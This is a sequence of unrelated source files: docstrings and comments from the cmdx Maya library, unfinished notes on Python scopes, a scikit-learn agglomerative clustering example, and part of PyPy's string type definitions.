>>> node["myArray"][0]
1.0
>>> node["myArray"][-1]
3.0
Cache previously found plugs, for performance
Cost: 4.9 microseconds/call
Part of the time taken in querying an attribute is the
act of finding a plug given its name as a string.
This causes a 25% reduction in time taken for repeated
attribute queries. Though keep in mind that state is stored
in the `cmdx` object which currently does not survive rediscovery.
That is, if a node is created and later discovered through a call
to `encode`, then the original and discovered nodes carry one
state each.
Additional challenges include storing the same plug for both
long and short name of said attribute, which is currently not
the case.
Arguments:
name (str): Name of plug to find
cached (bool, optional): Return cached plug, or
throw an exception. Default to False, which
means it will run Maya's findPlug() and cache
the result.
safe (bool, optional): Always find the plug through
Maya's API, defaults to False. This will not perform
any caching and is intended for use during debugging
to spot whether caching is causing trouble.
Example:
>>> node = createNode("transform")
>>> node.findPlug("translateX", cached=True)
Traceback (most recent call last):
...
KeyError: "'translateX' not cached"
>>> plug1 = node.findPlug("translateX")
>>> isinstance(plug1, om.MPlug)
True
>>> plug1 is node.findPlug("translateX")
True
>>> plug1 is node.findPlug("translateX", cached=True)
True
Find the original class of a plug-in by `name`
Return first member of an `iterator`
Example:
>>> def it():
... yield 1
... yield 2
... yield 3
...
>>> first(it())
1
Return members, converting nested object sets into its members
Example:
>>> from maya import cmds
>>> _ = cmds.file(new=True, force=True)
>>> a = cmds.createNode("transform", name="a")
>>> b = cmds.createNode("transform", name="b")
>>> c = cmds.createNode("transform", name="c")
>>> cmds.select(a)
>>> gc = cmds.sets([a], name="grandchild")
>>> cc = cmds.sets([gc, b], name="child")
>>> parent = cmds.sets([cc, c], name="parent")
>>> mainset = encode(parent)
>>> sorted(mainset.flatten(), key=lambda n: n.name())
[|a, |b, |c]
Get existing node from MObjectHandle.hashCode()
Get existing node from Node.hex
Read `attr`
Arguments:
attr (Plug): Attribute as a cmdx.Plug
type (str, optional): Unused
time (float, optional): Time at which to evaluate the attribute
Example:
>>> node = createNode("transform")
>>> getAttr(node + ".translateX")
0.0
Return whether or not `attr` exists
Arguments:
attr (str): Name of attribute to check
Example:
>>> node = createNode("transform")
>>> node.hasAttr("mysteryAttribute")
False
>>> node.hasAttr("translateX")
True
>>> node["myAttr"] = Double() # Dynamic attribute
>>> node.hasAttr("myAttr")
True
Return MObjectHandle.hashCode of this node
This a guaranteed-unique integer (long in Python 2)
similar to the UUID of Maya 2016
Return unique hashCode as hexadecimal string
Example:
>>> node = createNode("transform")
>>> node.hexStr == format(node.hashCode, "x")
True
Set visibility to False
Hide attribute from channel box
Note: An attribute cannot be hidden from the channel box
and keyable at the same time. Therefore, this method
also makes the attribute non-keyable.
Supports array and compound attributes too.
Load this shared as a plug-in
Call this prior to using the shared
Return the current plug-in instance of this node
Evaluate whether self is of `type`
Arguments:
type (int): MFn function set constant
Example:
>>> node = createNode("transform")
>>> node.isA(kTransform)
True
>>> node.isA(kShape)
False
The node exists somewhere in memory
Is the attribute keyable?
Return last member of an `iterator`
Example:
>>> def it():
... yield 1
... yield 2
... yield 3
...
>>> last(it())
3
Return the number of parents this DAG node has
Example:
>>> parent = createNode("transform")
>>> child = createNode("transform", parent=parent)
>>> child.level
1
>>> parent.level
0
List connections of `attr`
Arguments:
attr (Plug or Node):
Example:
>>> node1 = createNode("transform")
>>> node2 = createNode("mesh", parent=node1)
>>> node1["v"] >> node2["v"]
>>> listConnections(node1) == [node2]
True
>>> listConnections(node1 + ".v") == [node2]
True
>>> listConnections(node1["v"]) == [node2]
True
>>> listConnections(node2) == [node1]
True
List relatives of `node`
Arguments:
node (DagNode): Node to enquire about
type (int, optional): Only return nodes of this type
children (bool, optional): Return children of `node`
parent (bool, optional): Return parent of `node`
shapes (bool, optional): Return only children that are shapes
allDescendents (bool, optional): Return descendents of `node`
fullPath (bool, optional): Unused; nodes are always exact
path (bool, optional): Unused; nodes are always exact
Example:
>>> parent = createNode("transform")
>>> child = createNode("transform", parent=parent)
>>> listRelatives(child, parent=True) == [parent]
True
Lock attribute
Build a (left-handed) look-at matrix
See glm::glc::matrix_transform::lookAt for reference
+ Z (up)
/
/
(origin) o------ + X (center)
+ Y
Arguments:
origin (Vector): Starting position
center (Vector): Point towards this
up (Vector, optional): Up facing this way, defaults to Y-up
Example:
>>> mat = lookAt(
... (0, 0, 0), # Relative the origin..
... (1, 0, 0), # X-axis points towards global X
... (0, 1, 0) # Z-axis points towards global Y
... )
>>> tm = Tm(mat)
>>> int(degrees(tm.rotation().x))
-90
Return TransformationMatrix of `other` relative self
Example:
>>> a = createNode("transform")
>>> b = createNode("transform")
>>> a["translate"] = (0, 5, 0)
>>> b["translate"] = (0, -5, 0)
>>> delta = a.mapFrom(b)
>>> delta.translation()[1]
10.0
>>> a = createNode("transform")
>>> b = createNode("transform")
>>> a["translate"] = (0, 5, 0)
>>> b["translate"] = (0, -15, 0)
>>> delta = a.mapFrom(b)
>>> delta.translation()[1]
20.0
Return TransformationMatrix of self relative `other`
See :func:`mapFrom` for examples.
Return the first member
Centimeters (Maya's default unit) to Meters
Example:
>>> meters(100)
1.0
Return the name of this node
Arguments:
namespace (bool, optional): Return with namespace,
defaults to False
Example:
>>> node = createNode("transform", name="myName")
>>> node.name()
u'myName'
Get namespace of node
Example:
>>> _ = cmds.file(new=True, force=True)
>>> node = createNode("transform", name="myNode")
>>> node.namespace()
u''
>>> _ = cmds.namespace(add=":A")
>>> _ = cmds.namespace(add=":A:B")
>>> node = createNode("transform", name=":A:B:myNode")
>>> node.namespace()
u'A:B'
Return MObject of this node
Return parent of node
Arguments:
type (str, optional): Return parent, only if it matches this type
Example:
>>> parent = createNode("transform")
>>> child = createNode("transform", parent=parent)
>>> child.parent() == parent
True
>>> not child.parent(type="camera")
True
>>> parent.parent()
Return full path to node
Example:
>>> parent = createNode("transform", "myParent")
>>> child = createNode("transform", "myChild", parent=parent)
>>> child.name()
u'myChild'
>>> child.path()
u'|myParent|myChild'
Return the user-defined class of the plug-in behind this node
Delete an attribute
Arguments:
key (str): Name of attribute to delete
Example:
>>> node = createNode("transform")
>>> node["myAttr"] = Double()
>>> node.pop("myAttr")
>>> node.hasAttr("myAttr")
False
Prevent fatal crashes from illegal access to deleted nodes
Return transformation matrix as a Quaternion
Read attribute value
Arguments:
unit (int, optional): Unit with which to read plug
time (float, optional): Time at which to read plug
Example:
>>> node = createNode("transform")
>>> node["ty"] = 100.0
>>> node["ty"].read()
100.0
>>> node["ty"].read(unit=Meters)
1.0
Read from MDataHandle
Restore plug to default value
Handle arguments conveniently
- Allow for optional `space` argument
- Automatically convert tuple to Vector
Arguments:
rot (Vector, Quaternion): Rotation to add
This method does not typically support optional arguments
This method does not typically support optional arguments
Write `value` to `attr`
Arguments:
attr (Plug): Existing attribute to edit
value (any): Value to write
type (int, optional): Unused
Example:
>>> node = createNode("transform")
>>> setAttr(node + ".translateX", 5.0)
Interpret three values as an euler rotation
This method does not typically support optional arguments
Return shortest unique path to node
Example:
>>> _ = cmds.file(new=True, force=True)
>>> parent = createNode("transform", name="myParent")
>>> child = createNode("transform", name="myChild", parent=parent)
>>> child.shortestPath()
u'myChild'
>>> child = createNode("transform", name="myChild")
>>> # Now `myChild` could refer to more than a single node
>>> child.shortestPath()
u'|myChild'
Set visibility to True
Show attribute in channel box
Note: An attribute can be both visible in the channel box
and non-keyable, therefore, unlike :func:`hide()`, this
method does not alter the keyable state of the attribute.
Sort members of set by `key`
Arguments:
key (lambda): See built-in `sorted(key)` for reference
Whether or not to save this node with the file
Cache the given `mobj` and return its hashCode
This enables pre-caching of one or more nodes in situations where
intend to access it later, at a more performance-critical moment.
Ignores nodes that have already been cached.
Cache the given `mobj` and return its hex value
See :func:`toHash` for docstring.
Return TransformationMatrix
This method does not typically support optional arguments
Convert twist/swing1/swing2 rotation in a Vector into a quaternion
Arguments:
ts (Vector): Twist, swing1 and swing2
Return type name
Example:
>>> node = createNode("choice")
>>> node.type()
u'choice'
Retrieve API type of plug as string
Example:
>>> node = createNode("transform")
>>> node["translate"].type()
'kAttribute3Double'
>>> node["translateX"].type()
'kDoubleLinearAttribute'
Return the native maya.api.MTypeId of this node
Example:
>>> node = createNode("transform")
>>> node.typeId == tTransform
True
Apply a series of attributes all at once
This operates similar to a Python dictionary.
Arguments:
attrs (dict): Key/value pairs of name and attribute
Examples:
>>> node = createNode("transform")
>>> node.update({"tx": 5.0, ("ry", Degrees): 30.0})
>>> node["tx"]
5.0
Add several `members` to set
Arguments:
members (list): Series of cmdx.Node instances
Append timing information to a function
Example:
@withTiming()
def function():
pass
Can the user write to this attribute?
Convenience for combined call to `plug.connected`
and `plug.locked`.
Example:
>> if node["translateX"].writable:
.. node["translateX"] = 5
-*- coding: utf-8 -*- Bypass assertion error on unsupported Maya versions Output profiling information to console CAREFUL! This will flood your console. Use sparingly. Do not perform any caching of nodes or plugs Increase performance by not protecting against fatal crashes (e.g. operations on deleted nodes) This can be useful when you know for certain that a series of operations will happen in isolation, such as during an auto rigging build or export process. Increase performance by not bothering to free up unused memory Support undo/redo Required E.g. Preview Release 95 Aliases - API 1.0 Aliases - API 2.0 Accessible via `cmdx.NodeReuseCount` etc. Node reuse depends on this member DEPRECATED Reusable objects, for performance Animation curve interpolation, from MFnAnimCurve::TangentType Do not wrap the function. This yields zero cost to runtime performance microseconds Spaces Angular units Distance units Time units For isinstance(x, _Cached) It didn't exist, let's create one But first, make sure we instantiate the right type Module-level cache of previously created instances of Node Better to ask forgivness than permission Convert value to the given unit Create a new attribute NOTE: I can't be sure this is the only occasion where this exception is thrown. Stay catious. Only a few attribute types are supported by a modifier Else, write it immediately Callbacks Monitor node deletion, to prevent accidental use of MObject past its lifetime which may result in a fatal crash. func clientData Alias How is this value queried? The original function is a double negative Module-level branch; evaluated on import Else it will return name as-is, as namespace E.g. Ryan_:leftHand -> Ryan_, but :leftHand -> leftHand Alias TODO: Support more types of attributes, such that this doesn't need to happen. Alias Shapes have no children TODO: Unsure of exactly when this happens Module-level expression; this isn't evaluated at run-time, for that extra performance boost. Support filtering by typeName Skip self Support filtering by typeName Skip self MFnTransform Limit Types The error provided by Maya aren't very descriptive, help a brother out by look for common problems. Python 3 E.g. node["t"] + "x" E.g. node["translate"] + "X" getExisting... returns indices currently in use, which is important if the given array is *sparse*. That is, if indexes 5, 7 and 8 are used. If we simply call `evaluateNumElements` then it'll return a single number we could use to `range()` from, but that would only work if the indices were contiguous. Facilitate single-value attributes Support backwards-indexing Compound attributes have no equivalent to "MDependencyNode.findPlug()" and must be searched by hand. Alias Use setAttr in place of MPlug.isKeyable = False, as that doesn't persist the scene on save if the attribute is dynamic. Use setAttr in place of MPlug.isChannelBox = False, as that doesn't persist the scene on save if the attribute is dynamic. Use setAttr in place of MPlug.isKeyable = False, as that doesn't persist the scene on save if the attribute is dynamic. Store cached value Expected errors Disconnect any plug connected to `other` Don't do it, leave that to the parent context It doesn't like being handed `None` A more intuitive alternative Alias Alias, it can't take anything other than values and yet it isn't explicit in its name. Alias Alias Multi attributes _____ | | | || | || |_____|| |_____| E.g. locator["worldPosition"] E.g. transform["worldMatrix"][0] E.g. locator["worldPosition"][0] Simple attributes _____ | | | | | | |_____| E.g. choice["input"][0] E.g. transform["worldMatrix"][0] E.g. time1.timewarpIn_Hidden Unsure of why some attributes are invalid Number Enum In order to comply with `if plug:` Compound values Tuple values are assumed flat: e.g. (0, 0, 0, 0) Nested values are not supported: e.g. ((0, 0), (0, 0)) Those can sometimes appear in e.g. matrices Native Maya types Native Python types Tuple values are assumed flat: e.g. (0, 0, 0, 0) Nested values are not supported: e.g. ((0, 0), (0, 0)) Those can sometimes appear in e.g. matrices Helpful for euler rotations Don't store actual objects, to facilitate garbage collection. Support calling `doIt` during a context, without polluting the undo queue. Rollback changes Disconnect any plug connected to `other` Disconnect any plug connected to `other` Alias Support legacy maya.cmds interface PEP08 Speciality functions Superimpose end knots startpoints = [points[0]] * (degree - 1) endpoints = [points[-1]] * (degree - 1) points = startpoints + list(points) + endpoints -------------------------------------------------------- Attribute Types -------------------------------------------------------- Cache in datablock? Write value to file? Display in Attribute Editor? Support Attribute -> Attribute comparison Support Attribute -> string comparison Exclusive to numeric attributes Filled in on creation MyName -> myName 3 μs Identity matrix Support single-value default When no unit was explicitly passed, assume degrees When no unit was explicitly passed, assume seconds When no unit was explicitly passed, assume centimeters Compound itself has no defaults, only it's children do Forward attributes from parent to child Convenience aliases, for when it isn't clear e.g. `Matrix()` is referring to an attribute rather than the datatype. -------------------------------------------------------- Undo/Redo Support NOTE: Localised version of apiundo.py 0.2.0 https://github.com/mottosso/apiundo In Maya, history is maintained by "commands". Each command is an instance of MPxCommand that encapsulates a series of API calls coupled with their equivalent undo/redo API calls. For example, the `createNode` command is presumably coupled with `cmds.delete`, `setAttr` is presumably coupled with another `setAttr` with the previous values passed in. Thus, creating a custom command involves subclassing MPxCommand and implementing coupling your do, undo and redo into one neat package. cmdx however doesn't fit into this framework. With cmdx, you call upon API calls directly. There is little to no correlation between each of your calls, which is great for performance but not so great for conforming to the undo/redo framework set forth by Autodesk. To work around this, without losing out on performance or functionality, a generic command is created, capable of hosting arbitrary API calls and storing them in the Undo/Redo framework. >>> node = cmdx.createNode("transform") >>> cmdx.commit(lambda: cmdx.delete(node)) Now when you go to undo, the `lambda` is called. It is then up to you the developer to ensure that what is being undone actually relates to what you wanted to have undone. For example, it is perfectly possible to add an unrelated call to history. >>> node = cmdx.createNode("transform") >>> cmdx.commit(lambda: cmdx.setAttr(node + "translateX", 5)) The result would be setting an attribute to `5` when attempting to undo. -------------------------------------------------------- Support for multiple co-existing versions of apiundo. NOTE: This is important for vendoring, as otherwise a vendored apiundo could register e.g. cmds.apiUndo() first, causing a newer version to inadvertently use this older command (or worse yet, throwing an error when trying to register it again). This module is both a Python module and Maya plug-in. Data is shared amongst the two through this "module" Precautionary measure. If this doesn't pass, odds are we've got a race condition. NOTE: This assumes calls to `commit` can only be done from a single thread, which should already be the case given that Maya's API is not threadsafe. Temporarily store the functions at shared-level, they are later picked up by the command once called. Let Maya know that something is undoable Plug-in may exist in undo queue and therefore cannot be unloaded until flushed. Discard shared module Facilitate the above precautionary measure Without this, the above undoIt and redoIt will not be called -------------------------------------------------------- Commonly Node Types Creating a new node using a pre-defined Type ID is 10% faster than doing it using a string, but keeping all (~800) around has a negative impact on maintainability and readability of the project, so a balance is struck where only the most performance sensitive types are included here. Developers: See cmdt.py for a list of all available types and their IDs -------------------------------------------------------- -------------------------------------------------------- Plug-ins -------------------------------------------------------- Get your unique ID from Autodesk, the below should not be trusted for production. Support Divider plug-in, without name for readability. E.g. Divider("_", "Label") -> Divider("Label") Ensure no duplicates Maintain reference to original class Plugins written with Maya Python API 1.0 NOTE(marcus): The name *must* end with Manip See https://download.autodesk.com/us/maya/2011help /API/class_m_px_manip_container.html e95527ff30ae53c8ae0419a1abde8b0c -------------------------- Callback Manager -------------------------- Callbacks are all uninstalled using the same function relative either API 1.0 or 2.0 ---------------------- Cache Manager ---------------------- Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. | 51,399 | en | 0.639026 |
""" Global and local Scopes
Scopes and Namespaces
When an object is assigned to a variable # a = 10
that variable points to some object
and we say that the variable (name) is bound to that object
That object can be accessed using that name in various parts of our code
# ### I can't reference that (a) just anywhere in my code!
That variable name and it's binding (name and object) only "exist" in specific parts of our code
The porton of code where that name/binding is defined, is called the lexical scope of the variable
These bindings are stored in namespaces
(each scope has its own namespace)
The global scope
The global scope is essentially the module scope
It spans a single file only
There is no concept of a truly global (across all the modules in our app) scope in Python
The only exception to this are some of the built=in globally available objects, such as:
True False None dict print
The built-in global variables can be used anywhere inside our module
including inside any function
Global scopes are nested inside the built-in scope
Built-in Scope
Module 1 name spaces
Scope name var1 0xA345E
space func1 0xFF34A
Module 2
Scope name
space
If I reference a variable name inside a scope and Python does ot find it in that scope's namespace
Examples
module1.py Python does not find True or print in the current (module/global) scope
print(True) So, it looks for them in the enclosing scope -> build-in
Finds them there -> True
module2.py Python does not find a or print in the current (module/global) scope
print(a) So
""" | .history/my_classes/ScopesClosuresAndDecorators/GlobalLocalScopes_20210709212514.py | 1,931 | Global and local Scopes
Scopes and Namespaces
When an object is assigned to a variable # a = 10
that variable points to some object
and we say that the variable (name) is bound to that object
That object can be accessed using that name in various parts of our code
# ### I can't reference that (a) just anywhere in my code!
That variable name and it's binding (name and object) only "exist" in specific parts of our code
The porton of code where that name/binding is defined, is called the lexical scope of the variable
These bindings are stored in namespaces
(each scope has its own namespace)
The global scope
The global scope is essentially the module scope
It spans a single file only
There is no concept of a truly global (across all the modules in our app) scope in Python
The only exception to this are some of the built=in globally available objects, such as:
True False None dict print
The built-in global variables can be used anywhere inside our module
including inside any function
Global scopes are nested inside the built-in scope
Built-in Scope
Module 1 name spaces
Scope name var1 0xA345E
space func1 0xFF34A
Module 2
Scope name
space
If I reference a variable name inside a scope and Python does ot find it in that scope's namespace
Examples
module1.py Python does not find True or print in the current (module/global) scope
print(True) So, it looks for them in the enclosing scope -> build-in
Finds them there -> True
module2.py Python does not find a or print in the current (module/global) scope
print(a) So | 1,902 | en | 0.852117 |
"""
=============================================================================
Various Agglomerative Clustering on a 2D embedding of digits
=============================================================================
An illustration of various linkage option for agglomerative clustering on
a 2D embedding of the digits dataset.
The goal of this example is to show intuitively how the metrics behave, and
not to find good clusters for the digits. This is why the example works on a
2D embedding.
What this example shows us is the behavior "rich getting richer" of
agglomerative clustering that tends to create uneven cluster sizes.
This behavior is pronounced for the average linkage strategy,
that ends up with a couple of singleton clusters, while in the case
of single linkage we get a single central cluster with all other clusters
being drawn from noise points around the fringes.
"""
# Authors: Gael Varoquaux
# License: BSD 3 clause (C) INRIA 2014
print(__doc__)
from time import time
import numpy as np
from scipy import ndimage
from matplotlib import pyplot as plt
from sklearn import manifold, datasets
X, y = datasets.load_digits(return_X_y=True)
n_samples, n_features = X.shape
np.random.seed(0)
def nudge_images(X, y):
# Having a larger dataset shows more clearly the behavior of the
# methods, but we multiply the size of the dataset only by 2, as the
# cost of the hierarchical clustering methods are strongly
# super-linear in n_samples
shift = lambda x: ndimage.shift(x.reshape((8, 8)),
.3 * np.random.normal(size=2),
mode='constant',
).ravel()
X = np.concatenate([X, np.apply_along_axis(shift, 1, X)])
Y = np.concatenate([y, y], axis=0)
return X, Y
X, y = nudge_images(X, y)
#----------------------------------------------------------------------
# Visualize the clustering
def plot_clustering(X_red, labels, title=None):
x_min, x_max = np.min(X_red, axis=0), np.max(X_red, axis=0)
X_red = (X_red - x_min) / (x_max - x_min)
plt.figure(figsize=(6, 4))
for i in range(X_red.shape[0]):
plt.text(X_red[i, 0], X_red[i, 1], str(y[i]),
color=plt.cm.nipy_spectral(labels[i] / 10.),
fontdict={'weight': 'bold', 'size': 9})
plt.xticks([])
plt.yticks([])
if title is not None:
plt.title(title, size=17)
plt.axis('off')
plt.tight_layout(rect=[0, 0.03, 1, 0.95])
#----------------------------------------------------------------------
# 2D embedding of the digits dataset
print("Computing embedding")
X_red = manifold.SpectralEmbedding(n_components=2).fit_transform(X)
print("Done.")
from sklearn.cluster import AgglomerativeClustering
for linkage in ('ward', 'average', 'complete', 'single'):
clustering = AgglomerativeClustering(linkage=linkage, n_clusters=10)
t0 = time()
clustering.fit(X_red)
print("%s :\t%.2fs" % (linkage, time() - t0))
plot_clustering(X_red, clustering.labels_, "%s linkage" % linkage)
plt.show()
| examples/cluster/plot_digits_linkage.py | 3,092 | =============================================================================
Various Agglomerative Clustering on a 2D embedding of digits
=============================================================================
An illustration of various linkage option for agglomerative clustering on
a 2D embedding of the digits dataset.
The goal of this example is to show intuitively how the metrics behave, and
not to find good clusters for the digits. This is why the example works on a
2D embedding.
What this example shows us is the behavior "rich getting richer" of
agglomerative clustering that tends to create uneven cluster sizes.
This behavior is pronounced for the average linkage strategy,
that ends up with a couple of singleton clusters, while in the case
of single linkage we get a single central cluster with all other clusters
being drawn from noise points around the fringes.
Authors: Gael Varoquaux License: BSD 3 clause (C) INRIA 2014 Having a larger dataset shows more clearly the behavior of the methods, but we multiply the size of the dataset only by 2, as the cost of the hierarchical clustering methods are strongly super-linear in n_samples---------------------------------------------------------------------- Visualize the clustering---------------------------------------------------------------------- 2D embedding of the digits dataset | 1,364 | en | 0.755457 |
from pypy.objspace.std.stdtypedef import *
from pypy.objspace.std.basestringtype import basestring_typedef
from sys import maxint
from pypy.rlib.objectmodel import specialize
def wrapstr(space, s):
from pypy.objspace.std.stringobject import W_StringObject
from pypy.objspace.std.ropeobject import rope, W_RopeObject
if space.config.objspace.std.sharesmallstr:
if space.config.objspace.std.withprebuiltchar:
# share characters and empty string
if len(s) <= 1:
if len(s) == 0:
if space.config.objspace.std.withrope:
return W_RopeObject.EMPTY
return W_StringObject.EMPTY
else:
s = s[0] # annotator hint: a single char
return wrapchar(space, s)
else:
# only share the empty string
if len(s) == 0:
if space.config.objspace.std.withrope:
return W_RopeObject.EMPTY
return W_StringObject.EMPTY
if space.config.objspace.std.withrope:
return W_RopeObject(rope.LiteralStringNode(s))
return W_StringObject(s)
def wrapchar(space, c):
from pypy.objspace.std.stringobject import W_StringObject
from pypy.objspace.std.ropeobject import rope, W_RopeObject
if space.config.objspace.std.withprebuiltchar:
if space.config.objspace.std.withrope:
return W_RopeObject.PREBUILT[ord(c)]
return W_StringObject.PREBUILT[ord(c)]
else:
if space.config.objspace.std.withrope:
return W_RopeObject(rope.LiteralStringNode(c))
return W_StringObject(c)
def sliced(space, s, start, stop, orig_obj):
assert start >= 0
assert stop >= 0
assert not space.config.objspace.std.withrope
if start == 0 and stop == len(s) and space.is_w(space.type(orig_obj), space.w_str):
return orig_obj
if space.config.objspace.std.withstrslice:
from pypy.objspace.std.strsliceobject import W_StringSliceObject
# XXX heuristic, should be improved!
if (stop - start) > len(s) * 0.20 + 40:
return W_StringSliceObject(s, start, stop)
return wrapstr(space, s[start:stop])
def joined(space, strlist):
assert not space.config.objspace.std.withrope
if space.config.objspace.std.withstrjoin:
from pypy.objspace.std.strjoinobject import W_StringJoinObject
return W_StringJoinObject(strlist)
else:
return wrapstr(space, "".join(strlist))
def joined2(space, str1, str2):
assert not space.config.objspace.std.withrope
if space.config.objspace.std.withstrjoin:
from pypy.objspace.std.strjoinobject import W_StringJoinObject
return W_StringJoinObject([str1, str2])
else:
return wrapstr(space, str1 + str2)
str_join = SMM('join', 2,
doc='S.join(sequence) -> string\n\nReturn a string which is'
' the concatenation of the strings in the\nsequence. '
' The separator between elements is S.')
str_split = SMM('split', 3, defaults=(None,-1),
doc='S.split([sep [,maxsplit]]) -> list of strings\n\nReturn'
' a list of the words in the string S, using sep as'
' the\ndelimiter string. If maxsplit is given, at most'
' maxsplit\nsplits are done. If sep is not specified or'
' is None, any\nwhitespace string is a separator.')
str_rsplit = SMM('rsplit', 3, defaults=(None,-1),
doc='S.rsplit([sep [,maxsplit]]) -> list of'
' strings\n\nReturn a list of the words in the string S,'
' using sep as the\ndelimiter string, starting at the'
' end of the string and working\nto the front. If'
' maxsplit is given, at most maxsplit splits are\ndone.'
' If sep is not specified or is None, any whitespace'
' string\nis a separator.')
str_isdigit = SMM('isdigit', 1,
doc='S.isdigit() -> bool\n\nReturn True if all characters'
' in S are digits\nand there is at least one'
' character in S, False otherwise.')
str_isalpha = SMM('isalpha', 1,
doc='S.isalpha() -> bool\n\nReturn True if all characters'
' in S are alphabetic\nand there is at least one'
' character in S, False otherwise.')
str_isspace = SMM('isspace', 1,
doc='S.isspace() -> bool\n\nReturn True if all characters'
' in S are whitespace\nand there is at least one'
' character in S, False otherwise.')
str_isupper = SMM('isupper', 1,
doc='S.isupper() -> bool\n\nReturn True if all cased'
' characters in S are uppercase and there is\nat'
' least one cased character in S, False otherwise.')
str_islower = SMM('islower', 1,
doc='S.islower() -> bool\n\nReturn True if all cased'
' characters in S are lowercase and there is\nat'
' least one cased character in S, False otherwise.')
str_istitle = SMM('istitle', 1,
doc='S.istitle() -> bool\n\nReturn True if S is a'
' titlecased string and there is at least'
' one\ncharacter in S, i.e. uppercase characters may'
' only follow uncased\ncharacters and lowercase'
' characters only cased ones. Return'
' False\notherwise.')
str_isalnum = SMM('isalnum', 1,
doc='S.isalnum() -> bool\n\nReturn True if all characters'
' in S are alphanumeric\nand there is at least one'
' character in S, False otherwise.')
str_ljust = SMM('ljust', 3, defaults=(' ',),
doc='S.ljust(width[, fillchar]) -> string\n\nReturn S'
' left justified in a string of length width. Padding'
' is\ndone using the specified fill character'
' (default is a space).')
str_rjust = SMM('rjust', 3, defaults=(' ',),
doc='S.rjust(width[, fillchar]) -> string\n\nReturn S'
' right justified in a string of length width.'
' Padding is\ndone using the specified fill character'
' (default is a space)')
str_upper = SMM('upper', 1,
doc='S.upper() -> string\n\nReturn a copy of the string S'
' converted to uppercase.')
str_lower = SMM('lower', 1,
doc='S.lower() -> string\n\nReturn a copy of the string S'
' converted to lowercase.')
str_swapcase = SMM('swapcase', 1,
doc='S.swapcase() -> string\n\nReturn a copy of the'
' string S with uppercase characters\nconverted to'
' lowercase and vice versa.')
str_capitalize = SMM('capitalize', 1,
doc='S.capitalize() -> string\n\nReturn a copy of the'
' string S with only its first'
' character\ncapitalized.')
str_title = SMM('title', 1,
doc='S.title() -> string\n\nReturn a titlecased version'
' of S, i.e. words start with uppercase\ncharacters,'
' all remaining cased characters have lowercase.')
str_find = SMM('find', 4, defaults=(0, maxint),
doc='S.find(sub [,start [,end]]) -> int\n\nReturn the'
' lowest index in S where substring sub is'
' found,\nsuch that sub is contained within'
' s[start,end]. Optional\narguments start and end'
' are interpreted as in slice notation.\n\nReturn -1'
' on failure.')
str_rfind = SMM('rfind', 4, defaults=(0, maxint),
doc='S.rfind(sub [,start [,end]]) -> int\n\nReturn the'
' highest index in S where substring sub is'
' found,\nsuch that sub is contained within'
' s[start,end]. Optional\narguments start and end'
' are interpreted as in slice notation.\n\nReturn -1'
' on failure.')
str_partition = SMM('partition', 2,
doc='S.partition(sep) -> (head, sep, tail)\n\nSearches'
' for the separator sep in S, and returns the part before'
' it,\nthe separator itself, and the part after it. If'
' the separator is not\nfound, returns S and two empty'
' strings.')
str_rpartition = SMM('rpartition', 2,
doc='S.rpartition(sep) -> (tail, sep, head)\n\nSearches'
' for the separator sep in S, starting at the end of S,'
' and returns\nthe part before it, the separator itself,'
' and the part after it. If the\nseparator is not found,'
' returns two empty strings and S.')
str_index = SMM('index', 4, defaults=(0, maxint),
doc='S.index(sub [,start [,end]]) -> int\n\nLike S.find()'
' but raise ValueError when the substring is not'
' found.')
str_rindex = SMM('rindex', 4, defaults=(0, maxint),
doc='S.rindex(sub [,start [,end]]) -> int\n\nLike'
' S.rfind() but raise ValueError when the substring'
' is not found.')
str_replace = SMM('replace', 4, defaults=(-1,),
doc='S.replace (old, new[, count]) -> string\n\nReturn a'
' copy of string S with all occurrences of'
' substring\nold replaced by new. If the optional'
' argument count is\ngiven, only the first count'
' occurrences are replaced.')
str_zfill = SMM('zfill', 2,
doc='S.zfill(width) -> string\n\nPad a numeric string S'
' with zeros on the left, to fill a field\nof the'
' specified width. The string S is never truncated.')
str_strip = SMM('strip', 2, defaults=(None,),
doc='S.strip([chars]) -> string or unicode\n\nReturn a'
' copy of the string S with leading and'
' trailing\nwhitespace removed.\nIf chars is given'
' and not None, remove characters in chars'
' instead.\nIf chars is unicode, S will be converted'
' to unicode before stripping')
str_rstrip = SMM('rstrip', 2, defaults=(None,),
doc='S.rstrip([chars]) -> string or unicode\n\nReturn a'
' copy of the string S with trailing whitespace'
' removed.\nIf chars is given and not None, remove'
' characters in chars instead.\nIf chars is unicode,'
' S will be converted to unicode before stripping')
str_lstrip = SMM('lstrip', 2, defaults=(None,),
doc='S.lstrip([chars]) -> string or unicode\n\nReturn a'
' copy of the string S with leading whitespace'
' removed.\nIf chars is given and not None, remove'
' characters in chars instead.\nIf chars is unicode,'
' S will be converted to unicode before stripping')
str_center = SMM('center', 3, defaults=(' ',),
doc='S.center(width[, fillchar]) -> string\n\nReturn S'
' centered in a string of length width. Padding'
' is\ndone using the specified fill character'
' (default is a space)')
str_count = SMM('count', 4, defaults=(0, maxint),
doc='S.count(sub[, start[, end]]) -> int\n\nReturn the'
' number of occurrences of substring sub in'
' string\nS[start:end]. Optional arguments start and'
' end are\ninterpreted as in slice notation.')
str_endswith = SMM('endswith', 4, defaults=(0, maxint),
doc='S.endswith(suffix[, start[, end]]) -> bool\n\nReturn'
' True if S ends with the specified suffix, False'
' otherwise.\nWith optional start, test S beginning'
' at that position.\nWith optional end, stop'
' comparing S at that position.')
str_expandtabs = SMM('expandtabs', 2, defaults=(8,),
doc='S.expandtabs([tabsize]) -> string\n\nReturn a copy'
' of S where all tab characters are expanded using'
' spaces.\nIf tabsize is not given, a tab size of 8'
' characters is assumed.')
str_splitlines = SMM('splitlines', 2, defaults=(0,),
doc='S.splitlines([keepends]) -> list of'
' strings\n\nReturn a list of the lines in S,'
' breaking at line boundaries.\nLine breaks are not'
' included in the resulting list unless keepends\nis'
' given and true.')
str_startswith = SMM('startswith', 4, defaults=(0, maxint),
doc='S.startswith(prefix[, start[, end]]) ->'
' bool\n\nReturn True if S starts with the specified'
' prefix, False otherwise.\nWith optional start, test'
' S beginning at that position.\nWith optional end,'
' stop comparing S at that position.')
str_translate = SMM('translate', 3, defaults=('',), #unicode mimic not supported now
doc='S.translate(table [,deletechars]) -> string\n\n'
'Return a copy of the string S, where all characters'
' occurring\nin the optional argument deletechars are'
' removed, and the\nremaining characters have been'
' mapped through the given\ntranslation table, which'
